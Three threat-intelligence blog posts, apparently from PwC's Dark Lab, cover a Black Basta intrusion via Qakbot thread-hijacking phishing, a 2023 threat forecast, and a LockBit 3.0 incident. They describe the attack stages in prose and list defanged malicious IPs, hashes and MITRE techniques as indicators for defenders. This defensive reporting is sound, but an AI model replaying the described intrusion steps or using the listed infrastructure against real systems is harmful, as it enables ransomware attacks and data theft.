Cyber Threat Operations

Secure Your Holidays: The Case of Qakbot and Black Basta

Posted on by darklabhk

On the eve of Christmas, a suspected Black Basta affiliate conducted a ‘quick and dirty’ attack on a global client, lending insight into the opportunistic targeting of victims during holiday downtime periods.

The Significance of Dates

The holidays are a time for rest and rejuvenation for most. But for attackers, the holidays present a timely opportunity to exploit weakened security postures for a higher likelihood of successful intrusion. Attackers have been consistently observed to exploit the predictable patterns of organisations’ limited cyber preparedness during holiday seasons, largely driven by the shortage of personnel and lack appropriate response preparation measures, to achieve a ‘quick and dirty’ infiltration. Beyond opportunistic exploitation of weakened defences during the holidays, attackers are observed to conduct targeted attacks on dates of significance (e.g., political, religious, historical, legal dates of importance) as a means of taking a stance on a divisive topic or sending a clear message. In certain incidents, the date of intrusion attempts can provide a valuable indicator into the motivations and intentions of the threat actor behind the attack.

PwC’s Dark Lab have continuously observed the trend of increased incidents surrounding major holidays and dates of significance (e.g., Christmas, Chinese New Year, etc.), including our recent incident featuring the Qakbot banking trojan and attributed to the Black Basta ransomware-as-a-service (RaaS) group.

Initial Access: Conversation Hijacked

The incident was initiated by a phishing email disguised as a customer request to deliver the Qakbot banking trojan malware. Notably, the threat actor leveraged an old email thread dating back to January 2020 to the victim’s shared mailbox, as a means of leveraging an existing conversation with established trust to exhibit legitimacy.

We purposely do not disclose the email in this blog as the original mail sender is legitimate and was likely compromised. It was discovered via open source intelligence (OSINT) that the legitimate sender emails leveraged by the affiliate were potentially harvested during the 2021 ProxyLogon-related compromises that targeted vulnerable Microsoft Exchange Servers to perform thread hijacking, whereby attackers harvest legitimate emails to launch targeted phishing campaigns against previously uncompromised organisations. [1] The following key indicators were observed, validating our hypothesis that thread hijacking was conducted;

(1) Phishing emails were likely sent from a spoofed sender address, as evidenced by the SoftFail Sender Policy Framework (SPF) record indicating that the IP address may or may not be authorised to send from the domains. An SPF record facilitates spoofed email prevention and anti-spam control and acts as a filter to assess the authenticity of an email. A SPF soft fail occurs when an unauthorised sender email is received and quarantined in the victim’s spam folder, flagging the email as potentially suspicious. [2]
(2) The spear phishing link directed to the domain osiwa[.]org, which has been flagged by the community twice in 2023 to be malicious and associated with Qakbot. [3] As at the time of the incident, the phishing link displayed a HTTP status code 404, though we observed osiwa[.]org was scanned up to eight times between 1 December 2022 and 2 March 2023, potentially indicating that a number of other organisations had received a similar malicious link directing them to download the Qakbot malware.
(3) The affiliate performed partial scrubbing of the email header information during construction of their malicious email to remove content that does not align with their malicious content.
(4) Prior to the malicious email in Q4 2022, the last email in the thread was observed from 2020, indicating that the email was likely harvested as a result of the 2021 ProxyLogon mass exploitation for the purpose of thread hijacking.

Our analysis into the known-bad IP addresses reveal that six (6) of them – 24.69.84[.]237, 50.67.17[.]92, 70.51.136[.]204, 149.74.159[.]67, 38.166.221[.]92, and 173.76.49[.]61 have been flagged by the community as associated with Qakbot campaigns in the past.

In addition, a seventh IP address observed in the incident – 108.62.118[.]131 – has been reported to direct to a Cobalt Strike C2 Server. This IP has further been flagged on social media in multiple occasions to resolve to various malicious URLs registered via Namecheap. [4],[5] This, along with the fact that the ASN 30633 was LEASEWEB, are suspicious indicators suggesting it was a throwaway infrastructure potentially being deployed for malicious use.

Upon clicking on the phishing link, the malicious ZIP file was downloaded, and the victim unsuspectingly opened the file, initiating the execution phase. Post-infiltration, the victim’s endpoint detection alerted a potentially suspicious connection associated with FIN7’s (also known as Carbanak) C2 infrastructure. This observation enabled PwC’s Dark Lab analysts to discover that custom toolkits exclusively utilized by the Black Basta ransomware group have overlapping technical characteristics with FIN7, with further evidence to suggest that the custom tools leveraged by Black Basta may have potentially been developed by FIN7’s malware developers. [6] Further, given that Black Basta is widely recognized to leverage Qakbot for initial access in their campaigns, we posit with high confidence that the attack was conducted by a Black Basta affiliate.

Figure: Screenshot of our VirusTotal pivoting that attributed six IP addresses that were observed in your environment to be associated with Qakbot banking trojan.

Ransomware-as-a-Service Group Behind the Attack: Black Basta

Black Basta is a Russian-speaking ransomware group that operates as a Ransomware-as-a-Service (RaaS) affiliate network. First observed in early 2022, Black Basta is an evolution of the Conti ransomware, offering both Windows and Linux ransomware variants and known to perform double extortion – data encryption and listing stolen data on their leak site unless ransom demands are met. [7] To date, the group have been observed to compromise at least 193 victims across geographies and industries, as listed on their data leak site. Observations of Black Basta’s targeting history indicates no specific targeting against industries, reinforcing the group’s opportunistic nature financially driven motives.

Escalating Privileges

Post-infiltration via Qakbot, the suspected Black Basta affiliate established a call back connection to their C2 server and subsequently performed credential dumping to successfully obtain administrator access on the victim’s Domain Controller server.

Establishing Persistence and Lateral Movement

The affiliate proceeded to implant multiple backdoors to and leveraged domain administrator privileges to perform remote desktop protocol (RDP) via a PowerShell payload execution to establish persistence, gain remote control of the compromised hosts and laterally move across environments. Notably, we observed that the affiliate was capable of performing a cross-domain attack, compromising victims across geographical regions.

Defense Evasion

To evade detection, the threat actor disabled the Wazuh agent, an open-source security monitoring solution commonly leveraged by enterprise users as their Extended Detection and Response (XDR) and Security Information and Event Management (SIEM) logging platform.

Impact

Once defences were impaired, the affiliate proceeded to deploy the Black Basta ransomware on compromised environments by abusing rundll32.exe to stealthily execute the ransomware via proxy execution. In one instance, the actor was observed to utilise Secure File Transfer Protocol (SFTP) to exfiltrate data from the compromised server to a cloud-hosted server on Digital Ocean (142.93.198[.]225), though no compromised victim data was observed to be listed on Black Basta’s leak site.

As with all RaaS leak sites, we are unable to ascertain if the threat actor lists all their victims on their leak site. Though, per our experience, this is unlikely for a variety of reasons. Per our analysis of the Black Basta leak site, we noted that zero and partial (e.g. 30%) of complete publishing of data is possible. While there is no way to effectively prove the disclosed percentage of leakage, this suggests that Black Basta may choose to leak data in phases as part of their double extortion technique.

Meanwhile, anecdotal analysis of the published victims listed on the leak site indicates that previous victims that publicly announced the breach had a lead time of between one to three weeks prior to being listed on Black Basta’s leak site. While we do not have evidence to suggest that certain victims may not be listed, we assess the likelihood of Black Basta leaking data of undisclosed victims beyond the three-week period to be relatively lower, though not impossible given our previous experience with RaaS groups and cybercriminals.

Conclusion

Based on the findings of our investigation, PwC’s Dark Lab posits with high confidence that an affiliate of the Black Bata ransomware cybercriminal group were likely behind the incident. The incident was observed to take place within a short timeframe, with malicious actor(s) infiltrating the victim’s environment and subsequently escalating privileges on day one of the attack, followed by lateral movement, ransomware execution, and data exfiltration on day two. Given the timeliness of the incident, we posit the attacker intentionally targeted the victim during the holiday period under the assumption that the victim had limited capacity to detect and respond to their attack.

Recommendations

As RaaS groups continuously persist and evolve their attack vectors, it is vital that organisations implement robust, layered defence strategies based on the concept of zero trust.

  • Develop and maintain a contingency plan for holiday periods with expected limitations of manpower and capacity, ensuring allocated on-call members are regularly briefed on the incident response measures in case of attack
  • Implement a zero-trust security architecture to limit the likelihood of successful intrusion and/or containment of potentially impending attacks
  • Enhance email security controls (e.g., anti-phishing controls, sandbox analysis, etc.) on email security gateways and network devices (including external firewalls, web proxies)
  • Educate your employees, particularly those in roles that regularly interact with unknown senders (e.g., sales, customer service, human resources, finance, etc.) of the potential indicators to identify and report potential email thread hijacking attempts (e.g., spoofed senders, old email threads, partially scrubbed email addresses, malformed replies, repetitive use of the same harvested legitimate email, etc.).
  • Maintain “tertiary” offline backups (i.e., tertiary backup) that are encrypted and immutable (i.e., cannot be altered or deleted). This should be atop of your existing secondary data backups that should adopt security best practices, in particular network segmentation with your production and/or primary site
  • Perform a review of access management with respect to identity and network access (e.g., removal of legacy and unused accounts, housekeeping of privileges for all accounts, and enforce network segmentation to tighten access to key servers)
  • Enforce network segmentation, including identity segmentation in line with zero trust policies to restrict access based on identities, to reduce your attack surface and contain the potential impact of a ransomware attack

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

  • T1588.001 Obtain Capabilities: Malware
  • T1586 Compromise Accounts: Email Accounts
  • T1566.002 Phishing: Spear Phishing Link
  • T1199 Trusted Relationship
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204 User Execution
  • T1078.002 Valid Accounts: Domain Accounts
  • T1562.001 Impair Defenses: Disable or Modify Tools
  • T1021.002 Remote Services: SMB/Windows Admin Shares
  • T1428 Exploitation of Remote Services
  • T1003.006 OS Credential Dumping: DCSync
  • T1572 Protocol Tunneling
  • T1071 Application Layer Protocol: Cobalt Strike Beacon
  • T1041 Exfiltration Over C2 Channel
  • T1486 Data Encrypted for Impact

Indicators of Compromise (IoCs)

We include the observed IoCs in our encounter with Qakbot and Black Basta.

IndicatorFile Type
37bf163c9a37e27cdbb8c5db31457063Malicious Compiled Script (DLL)
142.93.198[.]225​IP Address – Resolving to Digital Ocean
50.67.17[.]92​Known-Bad IP – Associated with Qakbot Campaigns
149.74.159[.]67​Known-Bad IP – Associated with Qakbot Campaigns
24.69.84[.]237​Known-Bad IP – Associated with Qakbot Campaigns
70.51.136[.]204​Known-Bad IP – Associated with Qakbot Campaigns
38.166.221[.]92​Known-Bad IP – Associated with Qakbot Campaigns
108.62.118[.]131​Known-Bad IP​ – Cobalt Strike C2 Server
173.76.49[.]61​Known-Bad IP – Associated with Qakbot Campaigns
23.106.223[.]214​C2 IP

Further information

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

Forecasting the Cyber Threat Landscape: What to Expect in 2023

Posted on by darklabhk

In a blink of an eye, 2023 is upon us. As we bid farewell to another record-breaking year of increased disclosed vulnerabilities, ransomware incidents, phishing scams, data breaches, and crypto heists, it is hard not to imagine that this year will be any less eventful as threat actors aggressively lower the barriers to entry of “cybercriminalism” by crowdsourcing their tasks. Based on PwC Dark Lab’s observations throughout 2022, we share our assessment of the potentially most prevalent threats and potential trends in the upcoming year.

Hackers will weaponise exploits at an even faster rate and scale to bypass heightened controls, thus achieving near-instant impact beyond initial access

Threat actors have demonstrated their increasing sophistication in speed and scale through the decreased timeframe required to weaponise critical vulnerabilities. In 2022, threat actors were able to weaponise critical vulnerabilities such as Zimbra Collaboration arbitrary memcache command injection (CVE-2022-27924) and FortiOS authentication bypass (CVE-2022-40684) within three (3) days of the Proof-of-Concepts (POCs) being published to perform unauthenticated remote code execution. In extreme cases such as Log4Shell (CVE-2021-44228), we observed that the weaponisation occurred a mere eight (8) hours after public release from our first incident response of the year (read more here).

Part of the reason why threat actors need to go faster is due to improved security controls of service providers. For example, Microsoft announced in February 2022 that Microsoft Office would automatically block Visual Basic Applications (VBA) macros in all downloaded documents by default in a phased rollout approach between April and June. As a result, we observed threat actors expeditiously developing novel exploits to perform client-site execution that bypasses the newly introduced security controls. [1] This includes the Mark-of-the-Web (MOTW) vulnerability (CVE-2022-44698) which allows for specially crafted ZIP and ISO files to be downloaded and executed without undergoing integrity checks on the user’s endpoint. [2] PwC’s Dark Lab has actively responded to an incident in August 2022 that observed the threat actor deploying Magniber ransomware after exploiting the MOTW vulnerability.

Meanwhile, exploit toolkits are not new but are being matured to an extent where threat actors of all sophistication can utilise to achieve near-instant impact beyond just initial access. In the cases of Zimbra (CVE-2022-27924) and FortiOS (CVE-2022-40684), our incident response experience suggests that threat actors likely leveraged exploit toolkits to automatically chain the POC exploit with standardised steps to establish persistence, perform discovery, move laterally, and achieve elevated privileges if applicable. As a result, victims that did not swiftly apply patches or workarounds to mitigate the risks associated with critical vulnerabilities likely needed to conduct intelligence-led threat hunting to ensure that their environment was not further impacted in any way.

We hypothesise that the rate and scale of weaponisation would further increase as threat actors look to find novel means to bypass increasingly mature security controls at an organisation’s external perimeter, aided by threat actors maturing their automated toolkits to maximise impact upon initial access. The number of vulnerabilities in 2022 had already grown at an inexorable rate of 25 percent from the previous year from 20,171 to 25,226[3], including the SonicWall SSL VPN post-authentication arbitrary file read vulnerability zero-day (CVE-2022-22279) [4] that Dark Lab discovered in an incident response case by the LockBit Ransomware-as-a-Service (RaaS) group in March 2022 (read more here). In that case, we uncovered during our incident response that the exploit code was actively being circulated and discussed on dark web forums in February 2022 and actively weaponised by several threat actors several days after disclosure to circumvent multi-factor authentication (MFA) access controls if they had access to valid credentials.

Human-operated ransomware threat actors will increase their sophistication to make-up the shortfalls of the Crypto winter

Human-operated ransomware attacks have dominated the cyber threat landscape over the past three years, booming just prior to the wake of the Covid-19 pandemic in 2020. This is largely attributed to the rise of RaaS, such as LockBit 3.0 and BlackCat who have lowered the barriers to entry for low-level threat actors by providing a subscription-based affiliate model offering custom-developed ransomware packages.

Even as the cryptocurrency markets falter, our monitoring of the overall number of listed victims on ransomware group leak sites has not dropped significantly throughout 2022. To put this into context, since the downfall of the prominent industry-leading cryptocurrency exchange FTX [5], Bitcoin and other cryptocurrencies were down almost 70 percent relative to the start of the year. However, their value remains significantly higher in comparison to 2020 levels, suggesting that ransomware groups will not disappear.

We posit that ransomware attacks will continue to rise as threat actors look to increase their victim list to make up for the staggering decline in the value of cryptocurrencies and the extreme market volatility. Simple economics suggests that threat actors would need to make up their shortfall in cryptocurrency value decline by either increasing the ransom pay-out rate (i.e., probability) or increasing the number of victims (i.e., supply). As organisations’ defenses become more advanced, cybercriminals may also need to shift to more sophisticated techniques to achieve initial access. In a recent incident response, we also observed the RaaS group Black Basta achieve initial access via a mass-scale phishing campaign before deploying ransomware (read more in a future blog post!). We expect more of the same in 2023.

The race for talent is on – threat actors are collaborating, crowdsourcing, and leveraging artificial intelligence (AI) to innovate. Enterprises will level the playing field by embracing “learn to hack” and “hack to earn” concept.

Threat actors have always been looking to gain a competitive advantage by specialising and crowdsourcing their skillsets. In 2022, our dark web monitoring allowed us to observe a 400 percent increase in listings of Initial Access Brokers (IABs), which are specialised cybercriminals that sells access to compromised networks. This outsourcing model allows other cybercriminals, such as affiliates of RaaS groups including BlackCat/ALPHV, to focus on their domain expertise (read more here). This demonstrates that this model was effective to a large extent.

However, talent has never been more scarce. Innovative threat actors have resorted to other channels for growth and inspiration. For example, other RaaS groups such as LockBit 3.0 RaaS group introduced the first bug bounty programme offered by cybercriminals. This included up to US$ 1 million for hackers of all backgrounds should they identify critical flaws in their malware, tools, or infrastructure. [6] Other threat actors have been observed from our dark web monitoring to host regular hackathons promising prize pools of up to one (1) Bitcoin for technology-specific POCs. Finally, the introduction of new tools such as ChatGPT has pushed the barrier to entry to a much lower level, and it has never been easier for script kiddies to weaponise their exploits.

We theorise that threat actors would further seek out various means to improve their competitive advantage, including collaboration and crowdsourcing. This was already an existing trend due to the RaaS affiliate model and attack-as-a-service models such as IABs, but is being disrupted by bug bounty programmes, hackathons, and artificial intelligence as a means to overcome the global cybersecurity talent shortage and skills gap. [7] As a result, enterprises are now facing an uphill battle against threat actors that are led by organisations that are harnessing the power of the people. To level the playing field, we also expect that enterprises will explore how to embrace the “learn to hack” and “hack to earn” concepts. We posit that leading enterprises will participate in bug bounty programmes and shift away from regular vulnerability scans and penetration testing to continuous assessment by bounty hunters who may not be affiliated with any vendor. Meanwhile, we also expect to see the establishment of cyber academies with the intention of democratising security through the re-skilling and upskilling pf all interested individuals regardless of their technical background. This would also provide enterprises with a new talent pipeline to ensure we have sufficient resources to fight back against “cybercriminalism”.

Web-based exploitation and targeting of individual consumers will follow-up on the hype of metaverse and the web3 ecosystem

The metaverse has quickly gone from concept to working reality in the past years. A lot of talk in 2022 was focused on simulating physical operations on the metaverse activities through games, virtual experiences or shopping with cryptocurrency and other digital assets. These experiences are underpinned by technologies such as virtual reality (VR), augmented reality (AR) devices, and artificial intelligence (AI), which naturally introduce new risks and accentuates old ones due to interoperable platforms in web3. [8] In particular, phishing email and messaging scams are already successfully leveraged by threat actors to steal passwords, private keys, personal information and money. In the metaverse, that could be even easier, especially if people think they are speaking to the physical representation of somebody they know and trust, when it could be someone else entirely. [9]

We posit that 2023 would be the year where threat actors, in particular cybercriminals, make a large jump towards targeting both businesses and individual consumers, with an increased focus to exploit web-based vulnerabilities for initial access as a result of the growing connectivity and digitalisation. We had already observed this uprising trend in late 2022 with large-scale global smishing campaigns targeting Hong Kong and Singapore citizens by masquerading as trusted and reputable locally-based public and private postal service providers (read more here). The metaverse and web3 exacerbates consumer-targeting and introduces new vulnerabilities to an increased attack surface. Aside from smart contract weaknesses, further web-application based vulnerabilities such as Spring4Shell (CVE-2022-22965) is expected to be discovered, weaponised, and utilised by threat actors to deploy cryptocurrency miners. [10] PwC’s Dark Lab had uncovered the Spring4Shell POC on the dark web two days prior to the disclosure of the zero-day vulnerability (read more here), which further emphasises on the notion that the rate of weaponisation continues to accelerate from weeks to days or even hours.

Recommendations to Secure Your 2023

There is no telling with certainty what 2023 holds, but our experience with the challenges of 2022 teach us a number of valuable lessons on how organisations can harden their cyber security posture to protect against a multitude of attack vectors.

  • Grow selective hands-on technical capabilities in-house, and look to outsource and crowdsource your organisation’s security –
    • Get started with bug bounty programmes: organisations should look to emulate threat actors’ by crowdsourcing specific parts of their security initiatives. In particular, organisations should explore onboarding to bug bounty programmes as it leverages the competitive advantage of the community to identify potential vulnerabilities and misconfigurations rapidly and continuously in their external perimeter. This would level the playing field, and ensure that enterprises are not alone in facing threats from threat actors groups and their affiliates by themselves. If this route were pursued, organisations should ensure they have proper governance and processes (e.g., Vulnerability Disclosure Policy) to ensure responsible disclosure of potential vulnerabilities by bounty hunters.
    • Upskill and reskill your current workforce’s technical capabilities: organisations should not just rely on purely outsourcing security tasks, given there is a global shortage of talent. Instead, they should look for practical hands-on technical courses that would upskill and/or reskill their existing workforce to be more proficient in cyber threat operations, including but not limited to offensive security, security operations, incident response, threat intelligence, and threat and vulnerability management.
  • Enforce a Layered Intrusion Defense Strategy
    • Continuously Discover and Harden Your Attack Surface: organisations should prioritise efforts to evaluate their attack surface exposure by reviewing public-facing services and technologies in order to assess the potential risks of internet-facing services and making necessary countermeasures to eliminate the risk, such as reducing internet-exposed infrastructure, network segmentation, or decoupling the demilitarised zone from the internal network.
    • Protect Privileged Accounts: as we observe threat actors pivot targeting to end users, it is critical to enforce strong credential protection and management strategies and solutions to limit credential theft and abuse. This includes leveraging technologies such as account tiering and managed services accounts, enforcing multi-factor authentication (MFA), credential hardening from privileged accounts, and regular reviewing of access rights ensuring that all practices align with zero trust and least privilege policies.
    • Review and Strengthen Email Security: review current email solution configurations to ensure coverage from preventative security solutions (including external firewalls and web proxies) and implementation of conditional access rules to restrict access of suspicious activity. Consider hardening email security by leveraging artificial intelligence and machine learning technologies to augment the authentication process and create an additional barrier to restrict potential threats from bypassing detecting and delivering to the victim.
    • Identifying and Protecting Critical Internal Systems: threat actors target critical systems (i.e. Domain Controllers, local and cloud backup servers, file servers, antivirus servers) that house highly sensitive information, which observed in various incidents were not protected by EDR solutions. It is crucial that organisations secure critical systems by enforcing heightened approach to devising security strategies for critical assets – including EDR, stringent patching standards, network segmentation and regular monitoring for anomolies and/or indicators of compromise.
    • Defending Against Lateral Movement: the majority of threat actors moving across network rely on mechanisms that are relatively easy to disrupt with security restrictions such as restriction of remote desktop protocol between user zones, network zoning for legacy systems, segmenting dedicated applications with limited users, and disabling Windows Remote Management, among others.
  • Continuously Assess your Attack Surface Exposure to understand what threats present the most prevalent challenges to your organisations and uplift preventive and detective strategies to protect against likely threats.
    • Establish a robust attack surface management programme to continuously identify potential vulnerabilities on your public-facing applications, discover potential shadow IT, and stay alert to potential security risks as a result of the changing threat landscape (e.g., newly registered domains that may look to impersonate your organisation). External-facing assets should be protected with the relevant security solutions and policies to prevent, detect, and restrict malicious activity, as well as to facilitate rapid response and recovery in the case of a breach.
    • Perform threat modelling to identify the threat actor groups most likely to target your region and/or sector, map your attack surface to the identified potential threats to assess how a threat actor could exploit your attack surface, and develop a plan of action to minimise that threat exposure. Regardless of whether there was a breach or not, we also recommend organisations conduct iterative intelligence-led threat hunting using the outputs of the threat modelling. As a result, the threat model also needs to be updated on a regular basis (i.e., several times a year, if not already continuously).
    • Establish continuous dark web monitoring to discover if there are data breaches related to your organisation, as well as if threat actors such as IABs looking to sell access to compromised accounts and breached external assets such as web applications and web servers.
  • Adopt a ‘Shift Left’ Mindset – embed cybersecurity at the forefront of innovation and implementation of new platforms, products, as well as the adoption of cloud or software solutions.
    • DevSecOps: embedding cybersecurity considerations from the initial development stage enables developers to identify and address bugs and security challenges early in the development progress, strengthening the security posture of the platform to reduce vulnerabilities and attack surface exposure.
    • Adoption of new technologies: the shift left mindset can also be applied to the adoption of cloud, security, and other software solutions. Organisations should be maintain oversight and awareness of new technologies being deployed in their network, assess the scope and coverage of the solutions, and subsequently develop a process to assess the security implications and risks of using these technologies.

Further information

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

LockBit 3.0: New Capabilities Unlocked

Posted on by darklabhk

LockBit persists as the most prominent Ransomware-as-a-Service (RaaS) groups in 2022, showcasing heightened capabilities in their LockBit 3.0 iteration and a persistent nature to continuously evolve.

As the LockBit RaaS group re-emerges with their new and improved ransomware, LockBit 3.0 (also known as LockBit Black), we observed new capabilities and a heightened sophistication based on their increased frequency of attack and speed to impact, posing an ever-growing threat to organisations worldwide.

PwC’s Dark Lab observed over 860 breaches between 1 October 2021 and 31 October 2022 attributed to the LockBit RaaS group. 19% of global LockBit incidents impacted the Asia Pacific (APAC) region, with industries most prominently targeted in the region being Professional Services and Manufacturing Services, comprising 44% of total incidents observed in APAC. Despite this, we assess they are still opportunistic by nature and these statistics reflect that potentially certain industries are more likely victims potentially due to their overall lower maturity of controls when compared to regulated industries.

Figure 1: Dark Lab Observed Over 860 LockBit Incidents from LockBit’s Leak Site between October 2021 and October 2022

Figure 2: Industry Breakdown of LockBit Targeting in APAC according to LockBit’s Leak Site

Comprising approximately 40% of all ransomware attacks against APAC observed between 1 October 2021 and 31 October 2022, LockBit presents a persistent threat to the region. This blog extends from our previous blogs covering LockBit 2.0 to focus on the new 3.0 iteration, highlighting novel tactics, techniques, and procedures (TTPs) observed in Dark Lab’s recent incident. [1] [2]

A Recent Encounter with LockBit 3.0

In Q3 2022, PwC’s Dark Lab responded and contained a ransomware attack against a Chinese multinational conglomerate. Attributed to the LockBit 3.0 RaaS group, this was concluded with high confidence based on a number of key indicators, aligning with LockBit’s typical attack vector.

Firstly, similar to previous LockBit 2.0 incidents observed by PwC’s Dark Lab, the vulnerability exploited to obtain valid credentials was a SSL VPN vulnerability. In this instance, CVE-2018-13379 was exploited – a vulnerability in Fortinet’s outdated FortiOS and FortiProxy versions whereby an authenticated attacker may exploit the SSL VPN web portal to download system files using custom HTTP requests. [3]

Secondly, PwC’s Dark Lab discovered the presence of the LockBit executable file .lockbit and the StealBit.exe information stealer tool in the compromised environment, both of which are commonly deployed malwares by the LockBit RaaS group. [4]

FilenameLockBit.exe
MD5ad2918181f609861ccb7bda8ebcb10e5
File TypeWin32 EXE
File Size163,328 bytes
FilenameStealbit.exe
MD572e3efc9f6c7e36a7fb498ab4b9814ac
File TypeWin32 EXE
File Size441,856 bytes

StealBit.exe is a versatile, configurable information stealer with observed customisable configurations including the ability to specify network limit, maximum file size, filtering of files by keywords and file extensions, and optional features such as self-deletion and ScanShares.

A notable observation of the StealBit.exe running process was the list of keywords to filter and identify files for exfiltration, including keywords used to target files relating to specified insurance companies. Dark Lab hypothesises StealBit.exe was used to target information on the victim organisation’s insurance policy to understand their coverage pertaining to data breaches and ransomware attacks and adapt their ransom price accordingly. We posit this is a means of increasing the likelihood of their demanded ransom payment by targeting the victim’s insurance coverage, meaning that ransom payment would be covered by the insurance company, rather than the victim itself. Further, we observe keywords such as ‘violation’, ‘tax’, ‘evasion’, likely to collect evidence of the targeted victim’s misconduct to use as blackmail in the event the victim refuses to pay the ransom.

In examining the encryption process of lockbit.exe, we observed the total encryption speed of 3.8 minutes for 3,957 files (total file size 3080.16 mega byes), approximating an encryption speed of 13.6 megabytes per second. This comparatively fast encryption speed shows heightened capability of the LockBit ransomware, observed by various security researchers to have the highest encryption speed across ransomwares. [5]

Thirdly, Dark Lab observed a notable differentiator in comparison with previous LockBit 2.0 encounters – the presence of legacy RaaS group, BlackMatter’s code embedded in the LockBit codebase, signifying that the LockBit 3.0 iteration was executed in this incident. BlackMatter is a notorious RaaS group active from July 2021 to October 2021 known for targeting the U.S. health sector and suspected to be a rebranding of the DarkSide RaaS group. [6]

As observed by security researchers in the wake of LockBit 3.0, the new iteration of LockBit appears to borrow code from the legacy group with notable new features adopted from BlackMatter. This was further validated in an interview with the alleged LockBit founder, confirming that in preparation of LockBit 3.0, the group purchased the BlackMatter source code to enhance the ransomware. [7] Features utilised from the BlackMatter source code include API harvesting for privileged escalation, self-deletion of shadow copies using WMI via COM objects and the elimination of pre-existing bugs. [8]

Further investigation into the lockbit.exe executable file confirmed traces to LockBit 3.0. As evidenced below, the malware is a known malicious file matching YARA rules pinpointing relations to LockBit and BlackMatter respectively.

Figure 3: VirusTotal flagged that the LockBit executable file indicated matches to LockBit and BlackMatter
Figure 4: Evidence of LockBit 3.0 ransomware deployed in incident “95ddbeacd79ad7d944e75f55ca323a13076b756c4accefd28e206a76b3ea268b”  and confirmed association with BlackMatter

The Future of LockBit

The LockBit RaaS group has proven persistence and no means of halting operations. This is observed in the first-ever ransomware bug bounty program launched by the group in June 2022, awarding up to US$1 million to anyone able to identify critical bugs or provide innovative ideas to enhance their LockBit 3.0 ransomware. This not only exemplifies their financial viability, but it implies their intention to continue enhancing their offerings as a means of providing high consumer confidence and to retain and grow their affiliate base.

Figure 5: Screenshot of LockBit’s Bug Bounty Program Advertised on their Leak Site
Figure 6: Screenshot of LockBit’s Bug Bounty Program Advertised on their Leak Site

LockBit is recognised as a leader in the RaaS landscape, offering one of the best affiliate recruitment programs. This is largely due to their unique payment structure which favours affiliates and their lack of political association. [9] In an interview with an alleged LockBit member held in July 2022, the LockBit representative accredits their successful affiliate recruitment program to their emphasis on “honesty”, priding themselves as the only affiliate group known to “not touch the ransoms obtained by partners”. [10]

In a more recent interview on 30 October 2022, the blog vx-underground [11] spoke with the alleged founder of LockBit on the affiliate payment structure and origin story of the group. It was confirmed that LockBit’s founding members gain a 20% cut of affiliates’ profits, with this increasing to 30-50% in the event that the affiliate requires additional support from the group in performing negotiations with the targeted victim. The representative further confirmed that LockBit currently comprises of 10 core members (including pen testers, money launderers, testers, and negotiators) and an affiliate base of over 100 affiliates – which they aspire to grow to 300.

As observed in both interviews, LockBit has secured themselves as a market leader in the RaaS landscape due to their favourable payment structure, strong affiliate support system, and neutral political stance. As implied in the latest interview, the group endeavours to continue expanding their affiliate base which will reflect in a continuous enhancing of their ransomware products to differentiate themselves amongst other RaaS operators to attract new joiners. We posit that the RaaS scene will continue to expand as the competitive landscape will drive more effective, enticing ransomware packages – increasing accessibility and scale of operations for financially-driven low skill-levelled hackers – complete with instructions, toolkits, and custom malware to execute large-scale attacks.

Notably, LockBit affiliates are known to re-use known initial access points (e.g. SSL VPN vulnerabilities – Citrix Gateway (CVE-2019-19781), Pulse Secure (CVE-2019-11510), Fortinet FortiOS (CVE-2018-13379)). However, as per our post on LockBit 2.0’s SonicWall exploit to bypass multi-factor authentication (MFA) [12], the group is not averse to deviating from their usual attack path as we observed the affiliate chain a known SQLi vulnerability (CVE-2019-7481 or CVE-2021-20028) with an undisclosed zero-day vulnerability to circumvent the MFA access control of the victim’s SonicWall SRA SSL VPN.

A further evolution in LockBit’s attack path is their announcement to begin executing triple extortion tactics. This is in retaliation of the incident with security company Entrust, in which LockBit’s corporate data leak site was targeted by a Distributed Denial of Service (DDoS) allegedly executed by Entrust to stop Lockbit from leaking Entrust’s compromised data. This prompted LockBit RaaS to announce they will add a third extortion tactic, for maximum impact on targeted victims.

Figure 7: LockBit’s Triple Extortion Attack Path

Conclusion

LockBit 3.0 affiliates work on behalf of the LockBit group to conduct ransomware campaigns against organisations and industries across the globe. As previously posited in our technical analysis of LockBit 2.0 [13], the RaaS group is financially-driven and through these incidents we observed, affiliates with a diversified capability and skillset exploit are observed to exploit SSL VPN vulnerabilities to circumvent the MFA access control and obtain initial access. Organisations are encouraged to review the TTPs leveraged by LockBit affiliates as a result of our recent incident response experience to improve their preventive and detective controls.

Check out our previous LockBit blogs for the full technical analysis:

  • LockBit 2.0 affiliate’s new SonicWall exploit bypasses MFA [14]
  • Technical analysis of LockBit 2.0 affiliates’ SonicWall exploit that bypasses MFA [15]

Recommendations

As RaaS groups continuously persist and evolve their attack vectors, it is vital that organisations implement robust, layered defence strategies based on the concept of zero trust.

Preventative

  • Enforce a layered defence strategy incorporating secure network security protocols (including but not limited to firewall, proxy filtering, intrusion detection systems (IDS), intrusion prevention systems (IPS), secure VPNs and security gateways).
  • Optimising security application configurations for effective coverage, tailoring rules and configurations to business needs, or ensuring that out-of-the-box (OOTB) configurations provide adequate coverage.
  • Update your blacklist with the indicators of compromise (IoCs) shared below and block outgoing network connections to the identified C2 server. We encourage you to visit our previous LockBit blogs for an expansive list of LockBit IoCs identified by PwC’s Dark Lab.
  • Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).

Detective

  • Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as ensuring coverage of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.
  • Regularly scan your network environment for potential vulnerability(s) exposure and remediate immediately, such as deploying available patches, establishing regular schedules updates and periodically reviewing configuration settings for potential misconfigurations.
  • Conduct a search of historical logs to detect for any potential presence in your network environment, ensuring that an alert system is established should any indicators be identified. If any indicators are discovered, it is advised that a digital forensic investigation is conducted to identify the potentially foregone impact, including the compromised information and systems, and apply the appropriate containment and remediation measures.

Indicators of Compromise (IoCs)

We include the observed IoCs in our encounter with LockBit 3.0.

IndicatorFile Type
162[.]214[.]152 [.]179External server of StealBit
72e3efc9f6c7e36a7fb498ab4b9814acStealbit.exe
ad2918181f609861ccb7bda8ebcb10e5Lockbit.exe
131[.]107[.]255[.]255IP Address
